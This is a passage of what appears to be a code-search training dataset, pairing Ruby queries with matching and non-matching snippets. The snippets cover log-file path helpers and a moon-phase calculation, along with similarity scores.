"def logFile\n\t\tlogDir = self.setting(\"postgres:log_directory\", LOG_DIR)\n\t\tlogFile = self.setting(\"postgres:log_filename\", LOG_FILE)\n\t\t$log.debug(\"Service log file is #{logDir}/#{logFile}\")\n\t\treturn \"#{logDir}/#{logFile}\"\n\tend",
"def log_path\n @_log ||= ::File.join('log', \"#{ENV.fetch('RACK_ENV')}.log\")\n\n ENV.fetch('LOG_FILE', @_log)\n end",
"def log_full_pathname( data_import_session )\n # Memo-ize the filename the first time this is called:\n @log_filename ||= File.join( Rails.root, 'log', \"#{ get_log_basename(data_import_session) }#{ get_log_extension(data_import_session) }\" )\n end",
"def log_path\n \n @log_path = \"doc/mylog/articles\"\n \n end",
"def setup_logfile\n # strip any trailing '/' in case the user supplied this as part of\n # an absolute path, so we can match it against File.expand_path()\n path = @options.log_path.chomp(\"/\")\n if path.empty?\n path = File.join(Backup::Config.root_path, \"log\")\n elsif path != File.expand_path(path)\n path = File.join(Backup::Config.root_path, path)\n end\n FileUtils.mkdir_p(path)\n log_file = @options.log_file || \"backup.log\"\n path = File.join(path, log_file)\n if File.exist?(path) && !File.writable?(path)\n raise Error, \"Log File at '#{path}' is not writable\"\n end\n\n path\n end",
"def create_log_file_path\r\n log_dir = File.join(SAF::LOG, File.dirname(test_path))\r\n log_file_pre = File.join(log_dir,\r\n File.basename(test_path, \".*\"))\r\n \"#{log_file_pre}_#{Time.now.strftime('%Y%m%d_%H%M%S')}.log\"\r\n end",
"def log_file\n end",
"def log_file\n get_value :logfile\n end",
"def dev_error_filepath\n \"parse_logs/#{study_file.id}/log.txt\"\n end",
"def default_log_root\n File.join(kitchen_root, Kitchen::DEFAULT_LOG_DIR)\n end",
"def log_file_path\n rails_root + \"/log/redis.log\"\n end",
"def log_path\n File.join(RIGHT_LINK_SPEC_HELPER_TEMP_PATH, '__nanite.log')\n end",
"def log_file\n File.dirname(__FILE__)+\"/../../log/#{Rails.env}_statsd.log\"\n end",
"def log_file\n @log_file ||= (user_configuration_from_key('solr', 'log_file') || default_log_file_location )\n end",
"def access_log_path\n @_access_log ||= ::File.join('log', \"#{ENV.fetch('RACK_ENV')}_access.log\")\n\n ENV.fetch('ACCESS_LOG_FILE', @_access_log)\n end",
"def log_file\n File.join(Dir.pwd, 'log', \"sunspot-solr-#{ENV['RACK_ENV']}.log\")\n end",
"def log_file; end",
"def log_file\n return @log_file\n end",
"def log_file(id)\n \"#{log_file_directory}/#{log_file_name(id)}\"\n end",
"def log_file\n @log_file ||= @options[:log_file] ? File.expand_path(@options[:log_file]) : File.join(Rails.root, 'log', \"#{rails_environment}.log\")\n end",
"def user_error_filepath\n \"parse_logs/#{study_file.id}/user_log.txt\"\n end",
"def set_log_file_path(data_file_path)\n PureHailDB.ib_cfg_set(\"log_group_home_dir\", :string, data_file_path)\n end",
"def log_file\n File.join(::Rails.root, 'log', \"sunspot-solr-#{::Rails.env}.log\")\n end",
"def diagnostics_directory\n File.join(@relative_location, DIAGNOSTICS_DIRECTORY_NAME)\n end",
"def logfilter_path\n dir = File.expand_path(\".\")\n while true\n file = File.join(dir,FILTER_FILENAME)\n return file if File.exist?(file)\n break if dir.length < 2\n dir = File.dirname(dir)\n end\n nil\n end",
"def files_dir\n return File.absolute_path(File.join(@root_dir, 'weather'))\n end",
"def find_log_file\n Dir[\"#{@simulation.run_path}/in.log\"].first\n end",
"def logName(fullPath); \"#{fullPath.chomp(File.extname(fullPath))}.log\" end",
"def log_file\n Vedeu::Configuration.log\n end",
"def log_file\n if Merb::Config[:log_file]\n Merb::Config[:log_file]\n elsif Merb.testing?\n log_path / \"merb_test.log\"\n elsif !(Merb::Config[:daemonize] || Merb::Config[:cluster])\n STDOUT\n else\n log_path / \"merb.#{Merb::Config[:port]}.log\"\n end\n end",
"def expand_directories\n options[:logfile] = File.expand_path(logfile) if logfile\n options[:pidfile] = File.expand_path(pidfile) if pidfile\n end",
"def log_filename\n log_file.nil? || log_file.empty? || log_file == '-' ? nil : log_file\n end",
"def get_file_path(filename)\n # dir = File.realdirpath(File.join(File.dirname(__FILE__), '..', 'config'))\n File.join(@dir, filename)\n end",
"def auth_log\n return './auth.log' if @cfg['run_mode'] == 'full_debug'\n\n AUTH_LOG_FILES.each { |log_file| return log_file if File.exists?(log_file) }\n\n return nil\n end",
"def log_file_creation()\n\tcurrent_path = File.dirname(File.realpath(__FILE__))\n\t$csv_path = \"#{current_path}/Attachments.csv\"\n\tif !File.directory?(\"#{current_path}/logs\")\n\t\tFileUtils.mkdir_p \"#{current_path}/logs\"\n\tend\n\t$log_path = \"#{current_path}/logs/jira-attachment-upload.txt\"\n\t$log = Logger.new(\"#{current_path}/logs/jira-attachment-upload.txt\", 'daily')\nend",
"def log_path\n rails_root = Rails.root\n \"#{rails_root}/log/.irb-history\"\nend",
"def get_run_dir()\n \"#{node[:neon_logs][:flume_run_dir]}/#{node[:neon_logs][:flume_service_name]}\"\n end",
"def file_path\n dir\n end",
"def log_path\n \"#{Rails.root}/tmp/nsc/#{id.to_s}/processing_log.log\" \n end",
"def log_directory\n '/var/log/tokyotyrant'\n end",
"def file_path\n File.join(dir,filename)\n end",
"def log_file_path\n @translation_session ||= \"#{Time.now.strftime(\"%Y-%m-%d-%H-%M-%S-%3N\").parameterize}_#{rand(2**8)}\"\n file_path = File.join(self.class.root_dir, \"tmp\", \"locales\", \"log\", locale.to_s, \"#{@translation_session}.yml.backup\")\n create_empty_translations_file(file_path) if !File.exists?(file_path)\n file_path\n end",
"def log_file\n @hash[\"LogFile\"]\n end",
"def log_file\n self['resque.log_file'] || ::Rails.root.join('log/resque.log').to_s\n end",
"def logger_filename\n \"#{cm_cfg_path}/logs/configmonkey.log\"\n end",
"def cron_dot_d_directory\n end",
"def file_dir\n 'files'\n end",
"def directory_path\n @directory_path || Ferver::DEFAULT_FILE_SERVER_DIR_PATH\n end",
"def pool_logger_location\n ::File.join(logger_location, \"pool.log\")\n end",
"def files_dir\n return File.absolute_path(File.join(@root_dir, 'lib', 'files'))\n end",
"def log_file\n factorio.server.log_file\n end",
"def _FILESDIR; Config._FILES; end",
"def file_log\n @file_log ||= @repo.file_log @path\n end",
"def logme(target)\n\n\t# Create Filename info to be appended to files\n\tfilenameinfo = \"_\" + ::Time.now.strftime(\"%Y%m%d.%M%S\")\n\n\t# Create a directory for the logs\n\tlogs = ::File.join(Msf::Config.log_directory,'scripts', 'winbf')\n\n\t# Create the log directory\n\t::FileUtils.mkdir_p(logs)\n\n\t#logfile name\n\tdest = logs + \"/\" + target + filenameinfo\n\n\tdest\nend",
"def output_file\n staged_root.join(\"output.log\")\n end",
"def file_path\n dir_name + file_name\n end",
"def log_locations\n\n alpine = {path: \"#{Dir.home}\",\n archive_path: \"#{ASSEMBLE_ZIP_DIR}/alpine_logs\"}\n\n alpine_install = {path: \"/tmp/install.log\",\n archive_path: \"#{ASSEMBLE_ZIP_DIR}/alpine_install_logs\"}\n\n postgres = {path: \"#{@chorus_home}/shared/db/server.log\",\n archive_path: \"#{ASSEMBLE_ZIP_DIR}/postgres_logs\"}\n\n chorus = {path: \"#{Rails.root}/log\",\n archive_path: \"#{ASSEMBLE_ZIP_DIR}/chorus_logs\"}\n\n tomcat = {path: max_version_tomcat_path,\n archive_path: \"#{ASSEMBLE_ZIP_DIR}/tomcat_logs\"}\n\n [chorus, alpine, alpine_install, postgres, tomcat]\n end",
"def reporter_path(filename)\n File.join(File.dirname(__FILE__), 'reporter', filename)\n end",
"def relative_directory; end",
"def save_log_dir(log_dir, results_dir)\n end",
"def set_log_file(filename)\n\t @logfile = RequestStore.LOGS_PATH + filename\n\tend",
"def set_log_file(filename)\n\t @logfile = RequestStore.LOGS_PATH + filename\n\tend",
"def log(folder,log_file_glob=nil)\n deployed_apps_folder=\"#{ENV['HOME']}/cloudfoundry/deployed_apps\"\n log_file_glob ||= \"logs/*\"\n if File.exist?(deployed_apps_folder)\n folder_nb=0\n Dir.glob(File.join(deployed_apps_folder, \"#{name()}-*\")).each do |dir|\n fname=\"#{File.basename(dir)}\"\n app_log_folder=File.join(folder,fname)\n FileUtils.mkdir_p(app_log_folder)\n if File.exist? \"#{dir}/logs\"\n FileUtils.cp(Dir.glob(File.join(\"#{dir}\", \"logs/*\")), app_log_folder)\n end\n end\n end\n end",
"def path\n \"%s/%s\" % [dirname, filename]\n end",
"def cfg_dir\n File.join(@full_path, CONFIG_DIR)\n end",
"def path\n @path ||= File.dirname @config_file\n end",
"def basedir\n File.dirname File.absolute_path options[:file]\n end",
"def dir_path\n File.expand_path(File.dirname(@path))\n end",
"def hardlink_log(log)\n FileUtils.mkdir_p(\"log\")\n FileUtils.touch(log)\n\n kochiku_base_dir = File.join(__dir__, \"../../..\")\n\n FileUtils.mkdir_p(\"#{kochiku_base_dir}/logstreamer/logs/#{@build_attempt_id}/\")\n FileUtils.ln(log, \"#{kochiku_base_dir}/logstreamer/logs/#{@build_attempt_id}/stdout.log\")\n end",
"def my_application_log_name\n \"projects/#{@project_id}/logs/my_application_log\"\n end",
"def dump_directory\n File.join(@relative_to_base, DUMP_DIRECTORY_NAME)\n end",
"def log(value=nil)\n @_log ||= File.join(dir, \"log/#{File.basename(file)}.log\") if exists?(dir, file)\n value.nil? ? @_log : @_log = value\n end",
"def config_file_path(full_directory_path)\r\n config_path = File.join(full_directory_path, @folder_config)\r\n logger.debug('config_file_path') { \"Config file path: #{config_path}\"}\r\n config_path\r\n end",
"def files_path\n File.expand_path(\"#{Config.project_root}/files\")\n end",
"def create_logs_dir\n unless File.directory? LOGS_DIR\n Dir::mkdir LOGS_DIR\n end\n end",
"def default_log_file_name\n @options['log_file_name'] || \"#{@name}.log\"\n end",
"def dump_directory\n @relative_location.end_with?('/') ? @relative_location + DUMP_DIRECTORY_NAME : @relative_location + '/' + DUMP_DIRECTORY_NAME\n end",
"def dir\n File.dirname(__FILE__)\n end",
"def output_dir\n if experiment_id.nil?\n raise Exception.new('output_dir is not yet definable')\n end\n File.join(self.output_base, \"exp_#{self.experiment_id}\")\n end",
"def find_files(location)\n @@logs = {:todo => File.join(location, \"todo.log\"), \n :metrics => File.join(location, \"metrics.log\"), \n\t:error => File.join(location, \"error.log\"),\n\t:working => File.join(location, \"working.log\")\n }\n end",
"def path\n @path ||= Pathname.new(dir) + filename\n end",
"def root_file_path; end"
] | [
"0.8008632",
"0.8008632",
"0.796843",
"0.78381485",
"0.7828726",
"0.7653239",
"0.7590869",
"0.7574525",
"0.7451976",
"0.73812646",
"0.7275158",
"0.725862",
"0.7146819",
"0.71467555",
"0.7051824",
"0.70465666",
"0.7016004",
"0.6988616",
"0.69094336",
"0.689888",
"0.689093",
"0.6859501",
"0.6858426",
"0.6821019",
"0.6817046",
"0.6794873",
"0.67308253",
"0.67272645",
"0.6725099",
"0.66792613",
"0.6667597",
"0.66675603",
"0.6660697",
"0.6644807",
"0.66309613",
"0.65696186",
"0.65536577",
"0.65274847",
"0.6475512",
"0.6441433",
"0.6391281",
"0.63873386",
"0.63792187",
"0.63727874",
"0.636663",
"0.634654",
"0.6326754",
"0.6297784",
"0.62539595",
"0.6244059",
"0.6231927",
"0.62287587",
"0.61936134",
"0.6183146",
"0.6166226",
"0.61641437",
"0.6147665",
"0.6126931",
"0.6108702",
"0.6086097",
"0.6084862",
"0.6084066",
"0.6084",
"0.6080402",
"0.6079946",
"0.60649854",
"0.6055559",
"0.60462105",
"0.60428965",
"0.60337013",
"0.6032586",
"0.601384",
"0.59980935",
"0.59853244",
"0.5983165",
"0.59806675",
"0.59794295",
"0.5975555",
"0.59600806",
"0.59587604",
"0.59587604",
"0.5953399",
"0.59507203",
"0.59453297",
"0.5926774",
"0.59256315",
"0.5923777",
"0.59188646",
"0.5911993",
"0.5906652",
"0.59031236",
"0.5896485",
"0.5891423",
"0.5863688",
"0.5862094",
"0.5853837",
"0.5852696",
"0.5844083",
"0.58279526",
"0.58270466",
"0.58269274"
] | 0.0 | -1 |
Provide an absolute path within the current Brewed's state dir. | def state(*path)
[state_dir, *path].reduce(:+)
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def state_path(path); end",
"def state_file_path\n File.join(RIGHT_LINK_SPEC_HELPER_TEMP_PATH, '__state.js')\n end",
"def base_path\n Dir.pwd + \"/\"\n end",
"def abspath\n \"#{repo_base_path}/#{self.git_repo_path}\"\n end",
"def path\n '/' + path_states.map(&:name)[1..-1].join('/')\n end",
"def base_path\n @base_path ||= Dir.pwd\n end",
"def current_dir; end",
"def state_file\n return File.join(File.dirname(__FILE__), 'state.json')\n end",
"def local_yay_path\n\t\t\traise \"ENV[HOME] not found!\" unless ENV['HOME']\n\t\t\treturn \"#{ENV['HOME']}/.yay\"\n\t\tend",
"def current_path\n ::File.join(install_path, artifact_name, 'current')\n end",
"def abspath path\n if path[0] != '/'\n @homedir + '/' + path\n else\n path\n end\n end",
"def right_link_dynamic_state_dir\n return pretty_path(File.join(Dir::COMMON_APPDATA, 'RightScale', 'right_link'))\n end",
"def state(path:)\n add option: \"-state=#{path}\"\n end",
"def current_working_directory; @rye_current_working_directory; end",
"def path\n Pathname.new(\n File.expand_path(\n File.join(Gem.user_home, \".bowline\")\n )\n )\n end",
"def path\n env[PATH] ||= (env.has_key?(GIT) ? env[GIT].path : Dir.pwd)\n end",
"def state_file_path(state)\n \"#{@data_dir}/#{PathConstants::STATES_DIR}/#{state.filename}.geojson\"\n end",
"def path\n application? ? application_path : local_path\n end",
"def work_dir; end",
"def absolute_path(path)\n path = Pathname.new(path)\n return Pathname.new(@config.base_path) + path unless path.absolute?\n path\n end",
"def path\n @base\n end",
"def linked_path\n File.readlink current_directory\n end",
"def pristine_dir\n File.join pristine_dir_parent, name\n end",
"def right_link_static_state_dir\n return pretty_path(File.join(Dir::COMMON_APPDATA, 'RightScale', 'rightscale.d', 'right_link'))\n end",
"def event_state_dir(state_dir = nil)\n if ENV['WF_EVENT_STATE_DIR']\n Pathname.new(ENV['WF_EVENT_STATE_DIR'])\n elsif state_dir.nil?\n EVENT_STATE_DIR\n else\n Pathname.new(state_dir)\n end\n end",
"def my_path\n File.expand_path(File.dirname(__FILE__))\n end",
"def path\n @path ||= File.dirname @config_file\n end",
"def path\n File.join(@base, @name)\n end",
"def home_path\n File.expand_path(\"~\")\n end",
"def working_dir\n ENV['PWD'] || Dir.pwd\n end",
"def relative_working_dir\n invoke(:rev_parse, '--show-prefix')\n end",
"def base_dir(dir_name)\n File.expand_path(dir_name)\n end",
"def base_path\n @base_path ||= server_path(File.expand_path(Dir.pwd))\n end",
"def base_dir; end",
"def base_dir; end",
"def base_dir; end",
"def base_dir; end",
"def base_dir; end",
"def base_dir; end",
"def base_dir; end",
"def current\n\t\t\t\t\treturn Pathname.new(\".\")\n\t\t\t\tend",
"def relative_directory; end",
"def root\n Pathname.new(File.dirname(__dir__))\n end",
"def path()\n return ::File.join(@root, @name)\n end",
"def adjust_cb_path\n if @opts[:path]\n @opts[path] = File.join(Dir.pwd, @opts[:path])\n else\n @opts[:path] = Dir.pwd\n end\n end",
"def root; Pathname(__dir__).parent; end",
"def bits_full_local_path\n File.join(version_dir, BITS_FILENAME)\n end",
"def current_directory\n File.expand_path @current_directory\n end",
"def repo_path(path)\n File.join(File.expand_path('../../..', $0), path)\n end",
"def current_path\n File.expand_path(File.join(__FILE__,\"../\"))\nend",
"def abspath(file)\n File.absolute_path(file)\nend",
"def path\n File.expand_path File.join(basepath, version_dir, basename)\n end",
"def location\n return unless exists?\n folder_pathname.relative_path_from(root_path)\n end",
"def to_absolute_path\n File.join('', to.path(:default).to_s)\n end",
"def right_scale_static_state_dir\n return pretty_path(File.join(Dir::COMMON_APPDATA, 'RightScale', 'rightscale.d'))\n end",
"def root_path\n Pathname.new(File.expand_path(File.join(__dir__, '..', '..')))\nend",
"def local_path\n fetch_path(DevTools.gem_root)\n end",
"def root_path\n @root_path ||= `git rev-parse --show-toplevel`.chomp\n end",
"def relative_path(path)\n\t\tSass::Script::String.new(File.join(File.expand_path(Dir.pwd), path.value))\n\tend",
"def path\n File.join(@base, @name)\n end",
"def app_path(path)\n File.expand_path(path, Dir.pwd)\n end",
"def dir_path\n File.expand_path(File.dirname(@path))\n end",
"def path\n File.join(@base, @target)\n end",
"def relative_path\n @relative_path ||= absolute_path.sub(/^#{Bookshelf::remote_folder}\\/?/,'')\n end",
"def [](fpath=nil)\n if fpath.nil? || fpath.index('/') == 0\n @rye_current_working_directory = fpath\n else\n # Append to non-absolute paths\n if @rye_current_working_directory\n newpath = File.join(@rye_current_working_directory, fpath)\n @rye_current_working_directory = newpath\n else\n @rye_current_working_directory = fpath\n end\n end\n debug \"CWD: #{@rye_current_working_directory}\"\n self\n end",
"def __path__\n File.join(root, 'tmp', 'build')\n end",
"def status_file_path\n @status_file_path ||= WorkPath.path_for('global_lock')\n end",
"def path\n @backend.lib_dir + name_on_disk\n end",
"def basepath; end",
"def raw_gitdir\n\t\t\twith_dir do\n\t\t\t\treturn Pathname.new(%x/git rev-parse --git-dir/.chomp)\n\t\t\tend\n\t\tend",
"def getBAMPath()\n bamFile = Dir[\"*_marked.bam\"]\n\n if bamFile == nil || bamFile.length != 1\n return \"none\"\n else\n return Dir.pwd + \"/\" + bamFile[0].to_s\n end\n end",
"def state_filename\n File.join(@project.vartmp_dir, '.state.yaml')\n end",
"def dir_base\n File.expand_path(File.dirname(__FILE__)+\"/../..\")\n end",
"def relative_directory\n @relative_directory ||= \"_#{label}\"\n end",
"def base_dir=(_arg0); end",
"def base_dir=(_arg0); end",
"def base_dir=(_arg0); end",
"def base_dir=(_arg0); end",
"def base_dir=(_arg0); end",
"def base_dir=(_arg0); end",
"def base_dir=(_arg0); end",
"def base_dir=(_arg0); end",
"def path\n return ENV['ORBIT_FILE'] if ENV.include? 'ORBIT_FILE'\n\n [ENV.fetch('ORBIT_HOME'), 'config', 'orbit.json'].join(SEP)\n rescue KeyError\n raise 'env ORBIT_HOME not set'\n end",
"def file() = pathname.relative_path_from(Cnfs.config.paths.definitions)",
"def relative_path\n File.join(@repo, @bundle)\n end",
"def absolute_uri_path(path)\n \"#{root_uri}#{path}\"\n end",
"def base_relative_dir\n \t\t@dir.gsub(/^\\//,\"\")\n \tend",
"def path\n \"%s/%s\" % [dirname, filename]\n end",
"def default_path\n Gem.default_path + [@home]\n end",
"def set_git_path basedir\n @git_path = basedir\n end",
"def full_path\n container.root.join(path)\n end",
"def full_path\n container.root.join(path)\n end",
"def dir\n @working_directory\n end",
"def root\n File.dirname __dir__\n end",
"def root\n File.dirname __dir__\n end",
"def current_path\n current_folder.path\n end",
"def absolute_repository_path\n File.join(\n OpenProject::Revisions::Git::GitoliteWrapper.gitolite_global_storage_path,\n git_path\n )\n end",
"def path\n @path || File.expand_path(ENV['NEXUS_CONFIG'] || DEFAULT_FILE)\n end",
"def path\n @path ||= @project.dir.path\n end",
"def work_dir\n # The directory is not stored in a variable so it can be overridden\n # in specs.\n File.join(base_dir, \"ruby-#{RUBY_VERSION}\", \"rbs-#{RBS::VERSION}\", \"solargraph-#{Solargraph::VERSION}\")\n end"
] | [
"0.7103151",
"0.67575806",
"0.66171044",
"0.6490168",
"0.64491934",
"0.6438729",
"0.640515",
"0.6382533",
"0.63662404",
"0.6337073",
"0.6257011",
"0.62559515",
"0.6231415",
"0.6207783",
"0.61874485",
"0.6147358",
"0.6074683",
"0.6069712",
"0.60665756",
"0.6039887",
"0.6025222",
"0.60238683",
"0.60234934",
"0.6011597",
"0.60080725",
"0.5988571",
"0.5983889",
"0.5978437",
"0.5969499",
"0.5961912",
"0.5953533",
"0.59327215",
"0.5930209",
"0.5910779",
"0.5910779",
"0.5910779",
"0.5910779",
"0.5910779",
"0.5910779",
"0.5910779",
"0.59102327",
"0.59091806",
"0.5893345",
"0.5874607",
"0.58681715",
"0.5864382",
"0.5859693",
"0.58549494",
"0.5846596",
"0.58463186",
"0.5844172",
"0.5841627",
"0.5836146",
"0.5833907",
"0.5830735",
"0.5829904",
"0.5827954",
"0.58275557",
"0.5823259",
"0.5818946",
"0.58169544",
"0.5816056",
"0.5813521",
"0.58029735",
"0.57985973",
"0.57984185",
"0.57966566",
"0.5791218",
"0.57886916",
"0.577886",
"0.57770103",
"0.57697487",
"0.57661146",
"0.57543325",
"0.57392526",
"0.57392526",
"0.57392526",
"0.57392526",
"0.57392526",
"0.57392526",
"0.57392526",
"0.57392526",
"0.5733948",
"0.5733026",
"0.57280946",
"0.5727624",
"0.57263714",
"0.5722527",
"0.5703729",
"0.57009834",
"0.5695411",
"0.5695411",
"0.5695076",
"0.5693112",
"0.5693112",
"0.5692251",
"0.5683677",
"0.56836754",
"0.5682868",
"0.56766677"
] | 0.57346314 | 82 |
=============================================================================== Moon phases and Zodiac =============================================================================== Calculates the phase of the moon. 0 New Moon 1 Waxing Crescent 2 First Quarter 3 Waxing Gibbous 4 Full Moon 5 Waning Gibbous 6 Last Quarter 7 Waning Crescent | def moonphase(time=nil) # in UTC
time = pbGetTimeNow if !time
transitions = [
1.8456618033125,
5.5369854099375,
9.2283090165625,
12.9196326231875,
16.6109562298125,
20.3022798364375,
23.9936034430625,
27.6849270496875]
yy = time.year-((12-time.mon)/10.0).floor
j = (365.25*(4712+yy)).floor + (((time.mon+9)%12)*30.6+0.5).floor + time.day+59
j -= (((yy/100.0)+49).floor*0.75).floor-38 if j>2299160
j += (((time.hour*60)+time.min*60)+time.sec)/86400.0
v = (j-2451550.1)/29.530588853
v = ((v-v.floor)+(v<0 ? 1 : 0))
ag = v*29.53
for i in 0...transitions.length
return i if ag<=transitions[i]
end
return 0
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def moonphase(time) # in UTC\n transitions=[\n 1.8456618033125,\n 5.5369854099375,\n 9.2283090165625,\n 12.9196326231875,\n 16.6109562298125,\n 20.3022798364375,\n 23.9936034430625,\n 27.6849270496875]\n yy=time.year-((12-time.mon)/10.0).floor\n j=(365.25*(4712+yy)).floor + (((time.mon+9)%12)*30.6+0.5).floor + time.day+59\n j-=(((yy/100.0)+49).floor*0.75).floor-38 if j>2299160\n j+=(((time.hour*60)+time.min*60)+time.sec)/86400.0\n v=(j-2451550.1)/29.530588853\n v=((v-v.floor)+(v<0 ? 1 : 0))\n ag=v*29.53\n for i in 0...transitions.length\n return i if ag<=transitions[i]\n end\n return 0\nend",
"def _moon_phase_text(phase)\n if phase < 0.05\n 'new moon'\n elsif phase < 0.20\n 'waxing crescent moon'\n elsif phase < 0.30\n 'first quarter moon'\n elsif phase < 0.45\n 'waxing gibbous moon'\n elsif phase < 0.55\n 'full moon'\n elsif phase < 0.70\n 'waning gibbous moon'\n elsif phase < 0.80\n 'last quarter moon'\n elsif phase < 0.95\n 'waning crescent moon'\n else\n 'new moon'\n end\n end",
"def phase(dt = nil)\n dt = DateTime.now.to_time.utc.to_datetime unless dt\n pdate = dt.ajd\n\n # Calculation of the Sun's position.\n\n day = pdate - EPOCH\t# date within epoch\n n = ((360 / 365.2422) * day) % 360.0\n m = (n + ELONGE - ELONGP) % 360.0\t# convert from perigee\n # co-ordinates to epoch 1980.0\n ec = kepler(m, ECCENT)\t# solve equation of Kepler\n ec = Math.sqrt((1 + ECCENT) / (1 - ECCENT)) * Math.tan(ec / 2)\n ec = 2 * todeg(Math.atan(ec))\t# true anomaly\n lambdasun = (ec + ELONGP) % 360.0\t# Sun's geocentric ecliptic\n # longitude\n # Orbital distance factor.\n f = ((1 + ECCENT * Math.cos(torad(ec))) / (1 - ECCENT * ECCENT))\n sundist = SUNSMAX / f\t# distance to Sun in km\n sunang = f * SUNANGSIZ\t# Sun's angular size in degrees\n\n # Calculation of the Moon's position.\n\n # Moon's mean longitude.\n ml = (13.1763966 * day + MMLONG) % 360.0\n\n # Moon's mean anomaly.\n mm = (ml - 0.1114041 * day - MMLONGP) % 360.0\n\n # Moon's ascending node mean longitude.\n mn = (MLNODE - 0.0529539 * day) % 360.0\n\n # Evection.\n ev = 1.2739 * Math.sin(torad(2 * (ml - lambdasun) - mm))\n\n # Annual equation.\n ae = 0.1858 * Math.sin(torad(m))\n\n # Correction term.\n a3 = 0.37 * Math.sin(torad(m))\n\n # Corrected anomaly.\n mmp = mm + ev - ae - a3\n\n # Correction for the equation of the centre.\n mec = 6.2886 * Math.sin(torad(mmp))\n\n # Another correction term.\n a4 = 0.214 * Math.sin(torad(2 * mmp))\n\n # Corrected longitude.\n lp = ml + ev + mec - ae + a4\n\n # Variation.\n v = 0.6583 * Math.sin(torad(2 * (lp - lambdasun)))\n\n # True longitude.\n lpp = lp + v\n\n # Corrected longitude of the node.\n np = mn - 0.16 * Math.sin(torad(m))\n\n # Y inclination coordinate.\n y = Math.sin(torad(lpp - np)) * Math.cos(torad(MINC))\n\n # X inclination coordinate.\n x = Math.cos(torad(lpp - np))\n\n # Ecliptic longitude.\n lambdamoon = todeg(Math.atan2(y, x))\n lambdamoon += np\n\n # Ecliptic latitude.\n betam = todeg(Math.asin(Math.sin(torad(lpp - np)) *\n Math.sin(torad(MINC))))\n\n # Calculation of the phase of the Moon.\n\n # Age of the Moon in degrees.\n moonage = lpp - lambdasun\n\n # Phase of the Moon.\n moonphase = (1 - Math.cos(torad(moonage))) / 2\n\n # Calculate distance of moon from the centre of the Earth.\n\n moondist = (MSMAX * (1 - MECC * MECC)) /\n (1 + MECC * Math.cos(torad(mmp + mec)))\n\n # Calculate Moon's angular diameter.\n\n moondfrac = moondist / MSMAX\n moonang = MANGSIZ / moondfrac\n\n # Calculate Moon's parallax.\n\n moonpar = MPARALLAX / moondfrac\n\n pphase = moonphase\n mpfrac = (moonage % 360) / 360.0\n mage = SYNMONTH * mpfrac\n dist = moondist\n angdia = moonang\n sudist = sundist\n suangdia = sunang\n Phase.new(mpfrac, pphase, mage, dist, angdia, sudist, suangdia)\n end",
"def phases\n phs = ''\n PHASES.each do |ph|\n rating = self[\"power#{ph}_rating\".to_sym]\n phs += ph unless rating.nil? || rating.to_f == 0\n end\n phs\n end",
"def phase_one\n puts \"~~~~~PHASE 1~~~~~\".yellow\n 8.times do\n @borneo.immunity_challenge.tribal_council\n puts\n end\nend",
"def set_moon_clocks\n now = set_clocks\n \n # Has new or full moon expired?\n if now > $tnew1 || now > $tfull1\n $tnew0, $tnew1, $tfull0, $tfull1 = LunarYear.date_of_moons(now)\n end\n \n $last_new_moon.value = format_days(now - $tnew0)\n $next_new_moon.value = format_days($tnew1 - now)\n $last_full_moon.value = format_days(now - $tfull0)\n $next_full_moon.value = format_days($tfull1 - now)\nend",
"def phase_one\n\tputs \"Phase 1\"\n\t8.times do\n\t\ttribe_lost = @borneo.immunity_challenge\n\t\tputs \"#{tribe_lost.name} lost the game for immunity.\".green\n\t\tmember_voted_out = tribe_lost.tribal_council\n\t\tputs \"The tribe has spoken! #{member_voted_out.name.capitalize} it is time to go!\".green\n\t\tputs\n\tend\nend",
"def phases(wod)\n options = {\n wod: wod,\n response: api_connection.connection.get(\"phases/\"),\n directory: \"fpl_data/pulled_data/phases\",\n filename: \"phases_#{DateTime.current.strftime(\"%C%y-%m-%d\")}\"\n }\n\n CoreUtility::DataToJSON.write_or_display_data(options)\n end",
"def zodiac(month,day)\n time = [\n 3,21,4,19, # Aries\n 4,20,5,20, # Taurus\n 5,21,6,20, # Gemini\n 6,21,7,20, # Cancer\n 7,23,8,22, # Leo\n 8,23,9,22, # Virgo \n 9,23,10,22, # Libra\n 10,23,11,21, # Scorpio\n 11,22,12,21, # Sagittarius\n 12,22,1,19, # Capricorn\n 1,20,2,18, # Aquarius\n 2,19,3,20 # Pisces\n ]\n for i in 0...12\n return i if month==time[i*4] && day>=time[i*4+1]\n return i if month==time[i*4+2] && day<=time[i*4+3]\n end\n return 0\nend",
"def calculation(duration, loan, apr)\n loan * (apr / (1 - (1 + apr)**(-duration)))\nend",
"def zodiac(month,day)\n time=[\n 1,1,1,31, # The Apprentice\n 2,1,2,28, # The Companion\n 3,1,3,31, # The Beacon\n 4,1,4,30, # The Savage\n 5,1,5,31, # The Prodigy\n 6,1,6,30, # The Martyr\n 7,1,7,31, # The Maiden\n 8,1,8,31, # The Gladiator\n 9,1,9,30, # The Voyager\n 10,1,10,31, # The Thief\n 11,1,11,30, # The Glutton\n 12,1,12,31 # The Wishmaker\n ]\n for i in 0...12\n return i if month==time[i*4] && day>=time[i*4+1]\n return i if month==time[i*4+2] && day<=time[i*4+2]\n end\n return 0\nend",
"def phase_three\n puts \"Phase 3 has been started\"\n\n 7.times do\n immune = @borneo.individual_immunity_challenge\n puts \"#{immune} wins the immunity\".blue\n\t\tvoted_off_contestant = @merge_tribe.tribal_council(immune: immune)\n\t\t@jury.add_member voted_off_contestant\n\t\tputs \"#{voted_off_contestant}! is OUT!\".red\n end\nend",
"def update_phase\n new_topic.num_players_alive = num_mafia + num_town\n if phase == 1 || phase == -1\n phase = 0\n time_left = day_timelimit\n elsif phase == 0\n phase = 1\n time_left = night_timelimit\n end\n if new_topic.num_mafia >= new_topic.num_town\n gameover = true\n who_won = 0\n elsif num_mafia == 0\n gameover = true\n who_won = 1\n # else if other win condition \n end\n redirect_to root_path\n end",
"def test_Complex_InstanceMethods_phase\n\t\tassert_equal(0.9272952180016122, Complex(3,4).phase)\n\t\tassert_equal(2.214297435588181, Complex(-3,4).phase)\n\tend",
